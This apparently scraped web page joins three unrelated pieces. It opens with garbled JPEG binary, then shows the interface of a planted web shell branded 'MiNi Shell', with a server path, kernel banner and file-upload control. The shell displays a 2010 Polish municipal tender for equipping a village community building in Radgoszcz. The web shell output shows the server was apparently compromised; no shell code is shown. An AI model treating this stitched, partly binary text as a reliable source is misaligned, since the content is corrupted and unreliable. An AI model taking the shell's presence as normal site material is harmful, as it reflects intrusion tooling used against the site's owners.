JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100721/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20100721/194753-N-2010.html

<p class="kh_header"><b>Radgoszcz: Dostawa wyposażenia Budynku Integracji Społeczności
Wiejskiej w miejscowości Żdżary, Gmina Radgoszcz
- sprawa znak BI-3410/92/10</b><br>
<b>Numer ogłoszenia: 194753 - 2010; data zamieszczenia: 21.07.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Radgoszcz , pl. św Kazimierza 7-8, 33-207 Radgoszcz, woj. małopolskie, tel. 0-14 641-41-39, faks 0-14 641-46-61.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.radgoszcz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa wyposażenia Budynku Integracji Społeczności
Wiejskiej w miejscowości Żdżary, Gmina Radgoszcz
- sprawa znak BI-3410/92/10.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje dostawę:
I. ZESTAW KOMPUTEROWY - 6 szt.
Opis produktu:
-Obudowa - Czarna,  minimalne zatok 1x 5,25 1x,3,5,na froncie minimum 2x USB i audio (głośniki + mikrofon), min. 12 miesięcy gwarancji.
- Zasilacz - minimum 300W aktywne PFC minimalna ilość wtyków: 3xmolex 3xsata 1xflopy, 1xatx12v(4pin), wtyk zasilania 24pin, wentylator 12cm, min. 12 miesięcy gwarancji.
- Płyta główna - ASUS INTEL GIGABYTE lub równoważny. Magistrala min 1333MHz (ram min 800MHz) min 2xDDR, obsługiwana pamięć min 4GB, dwukanałowa obsługa pamięci, min 1x PCI-E 2xPCI, 2xSATA 1xPATA, 4xUSB wewnętrzne, 2xUSB zewnętrzne, min. 24 miesiące gwarancji.
- Karta Grafiki - PCI-E 16x Pamięć 512MB (DDR), chłodzenie pasywne, gniazda 1xD-SUB 1xHDMI 1xDVI, min. 24 miesiące gwarancji.
- Karta Dźwiękowa - Karta obsługująca system 5.1, możliwość podłączenia gniazd frontowych obudowy (mikrofon + słuchawki), min. 24 miesiące gwarancji.
- Procesor - INTEL lub równoważny. Dwurdzeniowy taktowani 2,8GHz (każdy rdzeń), magistrala 800MHz, min. 24 miesiące gwarancji.
- Mysz - Optyczna dwa przyciski + scrol, przewodowa, ps/2, czarna, min. 12 miesięcy gwarancji.
- Klawiatura - 104 klawisze, czarna ps/2, min. 12 miesięcy gwarancji.
- Monitor - Przekątna matrycy 19, proporcje 16:9, czas reakcji 5ms, kontrast 3000:1 wbudowane głośniki, min. 24 miesiące gwarancji.
- Dysk Twardy - Sata II 250GB, cach 16MB, 5400 obr/min, rozmiar 3,5, min. 24 miesiące gwarancji.
- Pamięć RAM - DDR 2GB (w jednym module) taktowanie min 1066MHz, min. 24 miesiące gwarancji.
- Napęd DVD-RW - Możliwość zapisu i odczytu nośników: DVD, DVD-R, DVD+R, DVD-RW, DVD+RW, DVD-R DL, DVD+R DL, DVD-RAM, Interface SATAII, Wewnętrzny, czarny, min. 24 miesiące gwarancji.
- Czytnik Kart - Wewnętrzny, czarny, obsługujący pamięci: MS, MS PRO, MS DUO, MS PRO DUO, MS MG, MS MG PRO, MS MG DUO, SD, miniSD, MMC, RS-MMC - MMC Mobile, MMCplus, CF I, CF II, Microdrive, SmartMedia, min. 24 miesiące gwarancji.
- Listwa Zasilająca - Czarna, 5x Gniazd 230V, długość przewodu 3m, max prąd znamionowy 10A, max prąd wyładowczy 6000A, system ochrony przeciwporażeniowej 2P+Z, min. 12 miesięcy gwarancji.
- System Operacyjny - Windows XP Home Edition +SP3, język polski.
- Karta sieciowa - 10 (Mbps) - 802.3 Ethernet , 10-100-1000 (Mbps) - 802.3u Fast Ethernet, min. 24 miesiące gwarancji.

II. STOLIK KOMPUTEROWY - 6 szt.
Opis produktu:
- Model - Biurko IGOR lub równoważny
- Szerokość - max. 82 cm
- Wysokość - ok. 75 cm
- Głębokość - ok. 50 cm
- Nóżki - nogi z płyty
- Materiał - płyta laminowana
- Kolor - olcha
- Styl wykonania - nowoczesny
- Gwarancja - min. 24 miesiące

III. FOTELE DO KOMPUTERA - 6 szt.
Opis produktu:
- Nr art.: 78-29805-9 OJEGA, lub równoważny
- Krzesło biurowe z niskim oparciem
- Regulowana wysokość i kąt nachylenia oparcia
- bez podłokietników
- Kolor - szary 
-Gwarancja - min. 12 miesięcy

IV. STOŁY 4 - OSOBOWE - 25 szt.
Opis produktu:
- Model - Stół ASTRA CHROM lub równoważny
- Nogi - z rurki fi 32 mm chromowane wyposażone w regulację poziomu, dokręcane do stelaża metalowego 
- Blat - płyta laminowana w kolorze olcha 18 mm, oklejana PCV 2,0 mm, wymiar blatu 80x60 cm.
- Końcówki rur zabezpieczone plastikowymi stopkami regulacyjnymi
- Gwarancja - min. 12 miesięcy

V. KRZESŁA - 100 szt.
Opis produktu:
- Model - Krzesło BOLEK CHROM lub równoważny
- Rozmiar - 6
- Krzesło wykonane na stelażu chromowanym Fi 25 mm
- Siedzisko i oparcie wykonane ze sklejki laminowanej w kolorze olcha
- Gwarancja - min. 12 miesięcy

VI. STÓŁ BILARDOWY - 1 szt.
Opis produktu:
- Kolor sukna - zielony
- Rozmiar - 8FT
- W zestawie min: 2 kije bilardowe, komplet bil, trójkąt, dwie kredy do kijów, szczotka do czyszczenia sukna.
- Stół wykonany z  płyty MDF
- Gwarancja - min. 12 miesięcy

VII. STÓŁ DO PING - PONGA (tenisa stołowego) - 1 szt.
Opis produktu:
- Wymiary - długość: 274 cm, szerokość: 152,5 cm 
- W zestawie konieczna siatka
- Kolor laminatu: zielony
- Możliwość składnia i łatwego przemieszczania (koła)

VIII. STOLIK PIŁKARSKI - 1 szt.
Opis produktu:
- Model - Piłkarzyki Spokey 84800, lub równoważny
- Wymiary: 139,2 x 75,6 x 86 cm 
- Płyty boczne: płyta MDF - grubość: 15 mm - szerokość: 35 cm 
- Nogi: 11,8 x 11,8 cm  (MDF o grubości 12 mm) 
- Pole gry: 118 x 68 cm (MDF o grubości 9 mm) 
- Punktacja: manualna 
- Drążki zawodników: 16 mm chromowana stal 
- Łożyska kulkowe 
- 4 uchwyty na napoje 
- Stopki poziomujące 
- 3 piłeczki 
- Powinien posiadać otwory na wyjmowane piłeczki, a także uchwyty z chromowanej stali, zapewniające pewny chwyt i niwelujące ślizganie się dłoni przy dynamicznej grze
- Gwarancja - min. 12 miesięcy

IX. SZACHY - 5 szt.
Opis produktu:
- Szachy magnetyczne z blatem drewnianym
- Figury posiadające magnez, podklejane, lakierowane, drewniane
- Kasetka posiadająca wkładkę na figury
- Wielkość pola - 30 mm
- Figury biało - brązowe lub biało - czarne

X. PROJEKTOR - 1 szt.
Opis produktu:
- Ful HD 
- Złącze HDMI 
- Jasność 3000 ANSI Lumenów 
- Kontrast 3000:1 
- Wyposażony w uchwyt do montażu pod sufitem (z możliwością regulacji)
- Gwarancja - projektor: min. 24 miesiące, lampa: min. 12 miesięcy

XI. TABLICA INTERAKTYWNA - 1 szt.
Opis produktu:
- Ekran ręczny montowany na ścianie
- Rozmiary ekranu -  minimum 300x225 cm

Dostawy objęte przedmiotem zamówienia muszą być zgodne z uwagami zawartymi 
w SIWZ,  oraz obowiązującymi przepisami prawa.

Miejsce dostawy: 
Teren Gminy Radgoszcz, powiat dąbrowski, województwo małopolskie..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 39.15.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Przystępując do niniejszego postępowania Wykonawca zobowiązany jest wnieść wadium w wysokości 1.000,00 zł (słownie: jeden tysiąc 00/100 złotych). 
2. Wadium należy wnieść w formach przewidzianych w art. 45 ust. 6 ustawy, tj.:
1) pieniądzu,
2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3) gwarancjach bankowych,
4) gwarancjach ubezpieczeniowych,
5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dna 9 listopada 2000r., o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr z 2007 Nr 42, poz. 275).

3. Wykonawca zobowiązany jest wnieść wadium przed upływem terminu składania ofert.

4. Wadium w pieniądzu należy wnieść na konto Zamawiającego:
Bank Spółdzielczy Dąbrowa Tarnowska, Nr 92-9462-0003-2002-2000-0062-0005
W przypadku wadium wnoszonego w pieniądzu za termin wniesienia uznaje się chwilę uznania kwoty na rachunku Zamawiającego.

5. W przypadku wniesienia wadium w formie innej niż pieniądz - oryginał dokumentu potwierdzającego wniesienie wadium należy złożyć przed upływem terminu składania ofert w siedzibie Zamawiającego tj. Urząd Gminy w Radgoszczy, adres: 33-207 Radgoszcz, Pl. Św. Kazimierza 7-8, pok. Nr 11 (sekretariat) lub zamieścić w osobnej kopercie - opisanej -wadium- dołączonej do oferty.
6. Nie wniesienie wadium w terminie lub w sposób określony w SIWZ spowoduje wykluczenie Wykonawcy na podstawie art. 24 ust. 2 pkt 2 ustawy, a jego oferta zostanie odrzucona na podstawie art. 24 ust. 4 ustawy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny na zasadzie spełnia/nie spełnia, na podstawie złożonego w ofercie dokumentu tj. wymienionego w pkt III 4.2, tj. aktualnego odpisu z właściwego rejestru, potwierdzającego uprawnienia Wykonawcy do wykonywania przedmiotowych usług.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Cena może być zmieniona gdy:
a) nastąpi urzędowa zmiana stawki podatku VAT,
   b) zamawiający ograniczy zakres zamówienia .
Podstawą ustalenia nowej ceny będą niezmienione stawki z formularza ofertowego.

2. Termin realizacji zamówienia może być zmieniony:
a)   w razie zakłócenia toku realizacji przedmiotu zamówienia przez protesty społeczne i ingerencje osób trzecich oraz wstrzymanie przez organ nadzoru budowlanego i inne ograny nadzoru, ale tylko po stwierdzeniu zaniedbań niezawinionych przez Wykonawcę,
b)   w przypadku opóźnień wynikających z:
- działania siły wyższej, np. klęski żywiołowej, 
- wystąpienia okoliczności, których strony umowy nie były w stanie przewidzieć pomimo zachowania należytej staranności. 

W przedstawionych przypadkach wystąpienia opóźnień strony ustalą nowe terminy realizacji z tym, że maksymalny okres przesunięcia terminu zakończenia równy będzie okresowi przerwy lub postoju.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.radgoszcz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Radgoszcz. Pl. Św. Kazimierza 7-8, 33-207 Radgoszcz,  Pokój Nr 6.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.07.2010 godzina 09:00, miejsce: Urząd Gminy Radgoszcz. Pl. Św. Kazimierza 7-8, 33-207 Radgoszcz,  Pokój Nr 11 (Sekretariat)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com